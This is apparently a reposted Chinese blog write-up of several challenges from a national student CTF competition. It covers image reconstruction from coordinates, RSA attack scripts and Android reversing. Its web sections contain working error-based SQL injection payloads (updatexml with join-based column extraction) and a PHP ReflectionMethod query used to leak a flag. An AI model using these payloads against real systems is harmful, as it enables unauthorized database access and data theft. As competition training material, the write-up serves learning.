飞道的博客

第十四届全国大学生信息安全竞赛部分wp

253人阅读  评论(0)


前言

第一次参加国赛,更让我清楚意识到自己是fw,做出几道题记录一下,期待自己的进步成长


MISC-Robot

下载得到

结合题目是机器,要求是找字符,百度一下rspag后缀名打开文件,看样子是要找坐标了 正好给了流量包wireshark打开追踪tcp流量,找坐标关键字眼,找的话有点麻烦直接搜pos看到关键内容

这里采用正则表达式直接提取出来正则yyds
python re库也支持,方便还是用在线资源

然后就是python 字符处理了得到关键坐标就行(记事本处理也很nice)
得到这种形式

然后就用python 画图工具matplotlib.pyplot当然PIL也行怎么好用用哪个 具体用法百度就知这里不再先说

补充用PIL写法

如果还没有装的话,有两个办法

  • 直接pip install pillow 然后就可以 from PIL import Image了
  • 如果在pycharm 里面 直接在软件库里装最好用了


然后下面有个install 等待装完就ok了
然后就是使用 直接看脚本吧 用起来特别方便
这里我们得到的是 坐标 直接 描点脚本如下
就是这里的Image.new(‘RGB’,size)还有其他方式RGB可以换成

1(1位像素,黑色和白色,存储一个像素每字节)
L(8位像素,黑色和白色)
P(8位像素,映射到任何其他模式使用调色板)
RGB (3x8位像素,真色)

前提是你已经得到这样字符坐标(这里是部分举例)

27,36
28,35
29,35
31,35
32,35
33,35
35,35
36,35
37,35
39,34
40,34
41,33
42,32
43,32
45,32
from PIL import Image
width,height=(300,200)
image= Image.new('RGB',(400,200))#创建一个RGB 长400宽200de图像层

file= open('tu.txt','r')
s=file.readline()
while(s):
    x=s.split(',')[0]#字符串分割获取第一个行x坐标
    y=s.split(',')[1]#字符串分割获取第一个行y坐标
    image.putpixel((int(x),int(y)),(255,255,255))#画图

    s=file.readline()
image.show()#展示图片

得到

方法二脚本

import matplotlib.pyplot as plt
x=['27', '28', '29', '31', '32', '33', '35', '36', '37', '39', '40', '41', '42', '43', '45', '47', '48', '49', '49', '50', '50', '51', '51', '51', '52', '52', '52', '52', '52', '52', '51', '50', '49', '48', '47', '46', '45', '44', '43', '42', '40', '39', '37', '35', '34', '32', '30', '28', '27', '26', '25', '24', '23', '22', '21', '20', '19', '18', '18', '18', '18', '18', '18', '18', '18', '18', '18', '18', '18', '19', '21', '21', '22', '24', '24', '26', '27', '28', '29', '30', '31', '33', '34', '35', '36', '37', '38', '39', '40', '41', '44', '46', '48', '50', '52', '53', '54', '55', '56', '58', '59', '61', '62', '64', '65', '67', '68', '70', '71', '71', '125', '125', '124', '123', '121', '118', '115', '113', '112', '111', '109', '106', '104', '103', '102', '101', '100', '99', '98', '97', '96', '95', '94', '93', '92', '91', '89', '87', '85', '85', '84', '83', '82', '82', '81', '81', '80', '80', '80', '80', '79', '79', '79', '79', '79', '79', '79', '79', '79', '80', '81', '82', '84', '87', '88', '90', '91', '93', '94', '97', '100', '101', '102', '103', '105', '106', '108', '109', '110', '111', '112', '112', '113', '114', '115', '115', '116', '117', '118', '118', '117', '116', '115', '115', '114', '114', '114', '114', '114', '114', '114', '114', '114', '115', '116', '117', '118', '120', '122', '124', '126', '128', '131', '133', '136', '138', '141', '143', '145', '147', '149', '150', '152', '153', '155', '156', '157', '157', '212', '212', '213', '211', '210', '209', '208', '207', '206', '205', '204', '201', '200', '199', '197', '196', '195', '193', '191', '189', '188', '187', '186', '185', '183', '183', '183', '182', '182', '182', '182', '182', '182', '182', '183', '184', '186', '187', '188', '189', '190', '192', '194', '196', '198', '199', '200', '201', '202', '203', '204', '207', '207', '208', '208', '208', '208', '208', '208', '208', '207', '207', '206', '204', '203', '202', '201', '201', '200', '199', '198', '197', '196', '195', '193', '192', '190', '189', '187', '185', '184', '183', '181', '180', '179', '178', '177', '175', '174', '173', '173', '243', '243', '244', '244', '244', '245', '245', '247', '247', '248', '248', '249', '250', '251', '251', '252', '254', '256', '258', '260', '262', '263', '265', '266', '267', '268', '271', '272', '273', '274', '275', '275', '274', '274', '272', '271', '271', '268', '266', '266', '265', '263', '262', '262', '261', '260', '259', '258', '258', '257', '255', '254', '253', '253', '252', '251', '250', '249', '248', '247', '246', '245', '244', '244', '298', '298', '299', '300', '302', '304', '306', '308', '309', '312', '315', '317', '319', '322', '325', '327', '330', '332', '334', '335', '335', '20', '20', '20', '20', '20', '20', '20', '19', '18', '17', '17', '17', '17', '17', '17', '17', '17', '17', '17', '17', '17', '17', '17', '18', '18', '19', '20', '20', '21', '21', '22', '23', '24', '25', '26', '27', '28', '29', '31', '32', '32', '34', '35', '37', '38', '40', '41', '43', '44', '46', '48', '49', '50', '51', '52', '52', '80', '80', '79', '78', '77', '77', '77', '76', '75', '74', '73', '73', '73', '72', '72', '72', '72', '72', '72', '72', '72', '72', '73', '74', '77', '78', '80', '81', '82', '83', '84', '85', '87', '89', '90', '92', '93', '95', '97', '98', '99', '100', '101', '102', '102', '104', '104', '105', '105', '105', '105', '105', '105', '104', '103', '102', '101', '98', '96', '95', '93', '92', '90', '89', '86', '86', '147', '147', '146', '145', '144', '143', '142', '142', '142', '142', '142', '141', '140', '139', '138', '138', '137', '135', '134', '133', '131', '131', '131', '130', '129', '128', '128', '127', '127', '126', '127', '129', '130', '132', '134', '137', '138', '139', '140', '143', '144', '145', '146', '147', '149', '149', '150', '151', '152', '152', '153', '153', '153', '153', '153', '153', '152', '151', '150', '149', '147', '147', '186', '186', '183', '182', '182', '182', '181', '179', '179', '179', '178', '177', '177', '177', '177', '177', '177', '177', '178', '179', '180', '181', '182', '184', '186', '187', '188', '190', '191', '192', '194', '196', '197', '197', '198', '200', '200', '201', '201', '201', '201', '201', '201', '201', '201', '201', '201', '200', '199', '198', '197', '196', '195', '193', '192', '190', '189', '189', '223', '223', '224', '226', '228', '229', '232', '233', '234', '235', '237', '238', '240', '241', '243', '244', '246', '247', '250', '251', '252', '253', '254', '254', '269', '271', '273', '275', '276', '278', '280', '282', '284', '285', '288', '289', '291', '293', '294', '296', '297', '298', '299', '299', '300', '299', '297', '296', '294', '294', '293', '293', '292', '291', '290', '288', '288', '287', '286', '285', '284', '283', '282', '281', '280', '279', '279', '327', '328', '330', '332', '333', '335', '337', '339', '341', '342', '345', '347', '348', '350', '351', '352', '355', '356', '356', '351', '350', '348', '347', '346', '343', '341', '339', '336', '333', '330', '327', '325', '323', '322', '319', '317', '316', '314', '313', '313']

y=['36', '35', '35', '35', '35', '35', '35', '35', '35', '34', '34', '33', '32', '32', '32', '31', '29', '28', '27', '26', '25', '23', '22', '21', '20', '19', '18', '17', '16', '15', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '14', '15', '16', '17', '19', '21', '22', '23', '24', '26', '27', '28', '30', '32', '33', '34', '37', '39', '40', '42', '44', '45', '47', '48', '49', '50', '51', '52', '53', '53', '54', '54', '54', '54', '54', '54', '54', '54', '54', '54', '54', '53', '53', '52', '52', '52', '51', '50', '49', '49', '47', '47', '46', '46', '45', '44', '44', '23', '23', '22', '22', '21', '20', '19', '19', '18', '18', '17', '16', '16', '16', '15', '15', '15', '15', '15', '15', '15', '15', '15', '15', '15', '15', '15', '17', '18', '19', '21', '21', '22', '23', '24', '26', '28', '29', '31', '32', '34', '35', '37', '39', '41', '43', '44', '46', '47', '48', '49', '50', '50', '51', '51', '51', '51', '51', '51', '51', '50', '49', '49', '48', '46', '45', '43', '42', '41', '39', '38', '36', '34', '33', '32', '31', '30', '28', '27', '28', '30', '32', '34', '36', '39', '41', '43', '45', '47', '48', '50', '52', '53', '54', '55', '56', '57', '57', '57', '57', '57', '57', '57', '57', '57', '57', '57', '56', '55', '53', '52', '52', '50', '49', '47', '46', '45', '45', '24', '24', '23', '21', '20', '19', '18', '17', '16', '15', '15', '14', '14', '14', '14', '14', '14', '14', '14', '16', '16', '16', '17', '17', '18', '20', '21', '22', '23', '24', '25', '26', '27', '29', '31', '32', '33', '34', '34', '35', '35', '36', '37', '37', '38', '38', '38', '38', '39', '39', '40', '41', '42', '43', '44', '45', '46', '48', '50', '51', '53', '54', '56', '58', '60', '61', '62', '63', '64', '64', '64', '65', '65', '65', '65', '65', '65', '65', '65', '65', '65', '65', '64', '63', '63', '62', '62', '61', '60', '59', '59', '20', '20', '19', '21', '25', '26', '29', '32', '34', '36', '37', '39', '40', '42', '43', '44', '44', '44', '44', '42', '41', '40', '38', '35', '32', '30', '27', '25', '22', '21', '20', '19', '18', '20', '22', '23', '26', '29', '33', '35', '37', '40', '42', '44', '47', '49', '51', '55', '56', '58', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '73', '64', '64', '65', '65', '65', '65', '65', '65', '65', '65', '65', '65', '65', '65', '65', '65', '65', '65', '66', '66', '66', '103', '104', '107', '110', '112', '114', '118', '121', '124', '126', '130', '134', '137', '139', '142', '143', '146', '147', '149', '150', '149', '148', '146', '145', '143', '142', '141', '140', '138', '137', '135', '134', '132', '131', '129', '128', '127', '126', '125', '124', '123', '121', '120', '120', '119', '118', '118', '117', '116', '115', '115', '114', '113', '113', '112', '112', '121', '121', '120', '121', '122', '123', '124', '127', '128', '129', '131', '132', '133', '135', '136', '137', '138', '139', '140', '142', '144', '145', '148', '149', '150', '150', '151', '151', '151', '151', '151', '151', '151', '151', '151', '150', '150', '149', '147', '146', '146', '145', '144', '142', '141', '139', '138', '136', '135', '133', '132', '131', '129', '128', '126', '126', '125', '123', '123', '123', '123', '122', '121', '121', '120', '120', '98', '98', '99', '100', '103', '104', '105', '106', '109', '111', '114', '118', '120', '123', '127', '129', '133', '135', '137', '139', '142', '143', '145', '146', '149', '152', '153', '156', '157', '158', '157', '157', '156', '156', '155', '153', '152', '151', '150', '149', '148', '147', '146', '145', '144', '143', '142', '141', '140', '139', '138', '137', '136', '135', '134', '133', '132', '131', '131', '130', '129', '129', '136', '136', '137', '138', '139', '140', '142', '144', '145', '147', '149', '150', '151', '152', '154', '156', '157', '158', '160', '161', '162', '163', '164', '164', '164', '164', '164', '163', '162', '162', '160', '159', '158', '156', '155', '153', '152', '150', '149', '148', '147', '145', '144', '142', '141', '139', '138', '136', '135', '135', '135', '135', '135', '135', '135', '135', '135', '135', '167', '167', '167', '167', '167', '167', '167', '167', '167', '167', '167', '167', '167', '167', '167', '167', '167', '167', '168', '168', '168', '168', '168', '168', '135', '136', '138', '140', '141', '143', '145', '147', '149', '150', '152', '153', '154', '156', '157', '159', '160', '161', '162', '162', '136', '136', '137', '138', '141', '142', '144', '145', '148', '149', '151', '153', '155', '156', '157', '159', '160', '161', '162', '163', '164', '165', '165', '142', '143', '145', '148', '149', '151', '154', '156', '158', '159', '160', '161', '162', '164', '165', '166', '168', '169', '169', '143', '143', '144', '144', '145', '148', '150', '152', '155', '158', '159', '162', '165', '167', '168', '170', '171', '171', '172', '172', '172']

x1=[]
y1=[]
for i in x:
    x1.append(float(i))
for j in y:
    y1.append(float(j))


print(x1)
print(y1)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(x1, y1,5)



plt.show()

效果如图
水平 竖直对称后得到flag

misc running_pixel

先用GifSplitter.exe这个分离软件分离 得到382张图片接着就是观察这图片规律

最后发现384这张图片有一个特别的地方,当时也看到了但是没多想,可恶。
题目是流动的像素那么 可以图片含有这些像素的给提取出来,说不定就能绘制成东西脚本如下

因为一个像素嘛,所以采取纯黑白来看图像,参考末初师傅的脚本画图得

from PIL import Image

flag_img = Image.new('1',(400,400))
#mode=1 1位黑白像素,每字节存储一个像素
for name in range(1,383):
    image= Image.open('IMG00'+str(name).zfill(3)+'.bmp')
    image = framepic.convert("RGB")#python PIL将RGB图像转换为纯黑白imag
    width,height = image.size
    for w in range(width):
        for h in range(height):
            if framepic.getpixel((w,h)) == (233,233,233):
                flag_img.putpixel((h,w),1)#原本用(w,h)发现是反的
   

    flag_img.save('./flag/'+str(name)+'.png')

然后得到图片就是漫长的整理 flag

一帧一帧整理出的字母

Misc tiny traffic

这道题先导出http包发现有好多东西

用file命令查看 那个flag_wrapper文件发现是由压缩文件解压得


没什么软用继续找下去 然后就不会了 后续更
后来才知道secret和text 文件是 br文件 还是接触的少了 直接解压得到
其中test 里面内容是这个

syntax = "proto3";

message PBResponse {
   
  int32 code = 1;
  int64 flag_part_convert_to_hex_plz = 2;
  message data {
   
    string junk_data = 2;
    string flag_part = 1;
  }
  repeated data dataList = 3;
  int32 flag_part_plz_convert_to_hex = 4;
  string flag_last_part = 5;
}

message PBRequest {
   
  string cate_id = 1;
  int32 page = 2;
  int32 pageSize = 3;
}

百度查阅知道那个secret 文件是 text 序列化后 然后百度找工具反序列话得到flag

隔空传话

当时没下附件 有附件更

密码学RSA

一打开题目发现是综合性rsa题目 分为三种

  • e=3 低加密指数攻击
  • 共模攻击
  • 已知p高位攻击

太常见了不分析了直接贴脚本

  1. e=3 低加密指数攻击
import gmpy2
from Crypto.Util.number import *
#file=open('flag.txt','a')

c1= 19105765285510667553313898813498220212421177527647187802549913914263968945493144633390670605116251064550364704789358830072133349108808799075021540479815182657667763617178044110939458834654922540704196330451979349353031578518479199454480458137984734402248011464467312753683234543319955893
e1=3
n1=123814470394550598363280518848914546938137731026777975885846733672494493975703069760053867471836249473290828799962586855892685902902050630018312939010564945676699712246249820341712155938398068732866646422826619477180434858148938235662092482058999079105450136181685141895955574548671667320167741641072330259009

i=0
while 1:
    m,b= gmpy2.iroot(c1+i*n1,3)
    if b:
        print(long_to_bytes(m))
        break
    i+=1

  1. 共模攻击
from gmpy2 import invert
def gongmogongji(n, c1, c2, e1, e2):
    def egcd(a, b):
        if b == 0:
            return a, 0
        else:
            x, y = egcd(b, a % b)
            return y, x - (a // b) * y
    s = egcd(e1, e2)
    s1 = s[0]
    s2 = s[1]

    if s1 < 0:
        s1 = - s1
        c1 = invert(c1, n)
    elif s2 < 0:
        s2 = - s2
        c2 = invert(c2, n)
    m = pow(c1, s1, n) * pow(c2, s2, n) % n
    return m

n1=111381961169589927896512557754289420474877632607334685306667977794938824018345795836303161492076539375959731633270626091498843936401996648820451019811592594528673182109109991384472979198906744569181673282663323892346854520052840694924830064546269187849702880332522636682366270177489467478933966884097824069977
e1=17
e2=65537
message1=54995751387258798791895413216172284653407054079765769704170763023830130981480272943338445245689293729308200574217959018462512790523622252479258419498858307898118907076773470253533344877959508766285730509067829684427375759345623701605997067135659404296663877453758701010726561824951602615501078818914410959610
message2=message2=91290935267458356541959327381220067466104890455391103989639822855753797805354139741959957951983943146108552762756444475545250343766798220348240377590112854890482375744876016191773471853704014735936608436210153669829454288199838827646402742554134017280213707222338496271289894681312606239512924842845268366950

m=gongmogongji(n1,message1,message2,e1,e2)
print(hex(m)[2:].decode('hex'))

  1. 已知p高位攻击p>>200 移位200 已知高位求p上sage脚本
p4 = 7117286695925472918001071846973900342640107770214858928188419765628151478620236042882657992902
n = 113432930155033263769270712825121761080813952100666693606866355917116416984149165507231925180593860836255402950358327422447359200689537217528547623691586008952619063846801829802637448874451228957635707553980210685985215887107300416969549087293746310593988908287181025770739538992559714587375763131132963783147L



pbits = 512


kbits = pbits - p4.nbits()
print (p4.nbits())
p4 = p4 << kbits
PR.<x> = PolynomialRing(Zmod(n))

f = x + p4
x0 = f.small_roots(X=2^kbits, beta=0.4)[0]
print ("x:" ,hex(int(x0)))
p = p4+x0
print ("p: ", hex(int(p)))
assert n % p == 0
q = n/int(p)
print ("q: ", hex(int(q)))

我用的在线sage环境得到

  1. 然后就是正常的rsa
from Crypto.Util.number import *
import gmpy2
file=open('flag.txt','a')
c3=59213696442373765895948702611659756779813897653022080905635545636905434038306468935283962686059037461940227618715695875589055593696352594630107082714757036815875497138523738695066811985036315624927897081153190329636864005133757096991035607918106529151451834369442313673849563635248465014289409374291381429646
e3=65537
n3=113432930155033263769270712825121761080813952100666693606866355917116416984149165507231925180593860836255402950358327422447359200689537217528547623691586008952619063846801829802637448874451228957635707553980210685985215887107300416969549087293746310593988908287181025770739538992559714587375763131132963783147L
p_=7117286695925472918001071846973900342640107770214858928188419765628151478620236042882657992902
p=0xda5f14bacd97f5504f39eeef22af37e8551700296843e536760cea761d334508003e01b886c0c69b4365759fb42a3faaf0c8888106bb9dbb1137769a37d191a7
q=n3//p
phn=(p-1)*(q-1)
d=gmpy2.invert(e3,phn)
print(long_to_bytes(pow(c3,int(d),n3)))

  1. 综合起来deiflag字符串解就完了
import hashlib
#assert md5.new(text).hexdigest() == flag[6:-1]
text=''' 
O wild West Wind, thou breath of Autumn's being,
Thou, from whose unseen presence the leaves dead
Are driven, like ghosts from an enchanter fleeing,
Yellow, and black, and pale, and hectic red,
Pestilence-stricken multitudes: O thou,
Who chariotest to their dark wintry bed
'''
import hashlib         #导入hashlib模块

md = hashlib.md5()     #获取一个md5加密算法对象
md.update(text.encode('utf-8'))
print(md.hexdigest())

web1

老注入题了

  1. 首先题目是简单的sql注入题目
    常规试一下1’ 有明显的回显信息

还出现了) 那么思路有了闭合括号 用报错注入解
查列名 :

admin’) or updatexml(0x2e,concat(0x2e,(select table_name from
information_schema.tables where table_schema=database())),0x2e)#

发现 结果出现了no 经过排查 是过滤了infromation_schema库
而infromation_schema库的作用无非就是可以获取到table_schema,table_name,column_name这些数据库内的信息。
经百度查阅发现了一个注入中在mysql默认情况下就可以替代information_schema库的方法。利用join进行无列名注入,。
2. 之前先试了一波猜表名:
3.

试了一次就成了还有 常见的 f1ag,fllllag等等
那么就好做了 直接一条龙

1’) or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as
a join flag b)c)),0x2e)#

得到字段 为id

1’) or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as
a join flag b using(id))c)),0x2e)#

获取第一列的列名

1’) or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as
a join flag b using(id))c)),0x2e)#

获取次列及后续列名

1’) or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as
a join flag b using(id,no))c)),0x2e)#

获取次列及后续列名

1’) or updatexml(0x2e,concat(0x2e,(select
540e9e3b-e0e6-4435-803a-c53b13d38fe4 from flag)),0x2e)#

得到值540e9e3b-e0e6-4435-803a-c53b13d38fe4

1’) or updatexml(0x2e,concat(0x2e,(select
540e9e3b-e0e6-4435-803a-c53b13d38fe4 from flag)),0x2e)#

得到flag 大部分

利用substring 或 left right 得到全部flag

1’) or updatexml(0x2e,concat(0x2e,substring((select
540e9e3b-e0e6-4435-803a-c53b13d38fe4 from flag),10,30)),0x2e)#

参考博客

Re1

下载题目文件,如题目描述中所说,本题破解的是一个android软件。

点击下载发现是apk文件,apk文件与.net程序大致类似,没有加密,可以直接反编译得到源代码。使用工具:GapkTool,点击GapkTool.bat启动程序

设置apk文件和输出目录,执行反编译,等待输出完成

将程序反编译输出后,找到这个程序的java源代码
MainActivity.java。
用记事本打开,可以发现有这么关键的一句:

if(mainactivity.checkFlag(mainactivity.txt.getText().toString()))

通过分析可以得到该语句调用了native层的一个校验函数,并查看native层函数
发现c2RuaXNjc2RuaXNjYWJjZA并不对,那么进行sub_16d8查看函数
sub_16d8函数为RC4加密算法,最终解密解得答案
6654d84617f627c88846c172e0f4d46c

web2

这个是原题,

没啥思路先扫一手

得到了 index.php.swo 备份文件 之前一直写swp 试了好久,得到了猜测 flag 是藏在类的注释中,我们能够实例化任意类,并调用类方法,那么就可以利用 PHP 内置类中的 ReflectionMethod 来读取 User 类里面各个函数的注释

构造的pylaod为
?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment
因为不知道是在哪个函数的注释中,所以逐个函数暴破,暴破 rb 的值a-z
最终在q中发现flag

还有很多题目学会了会补上

总结

通过题目证明自己学的还是远远不够的忙完比赛就回归学习了 ctf先告一段落,不过还是会坚持下去的,向着游泳健将进攻


转载:https://blog.csdn.net/qq_46540840/article/details/116894685
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场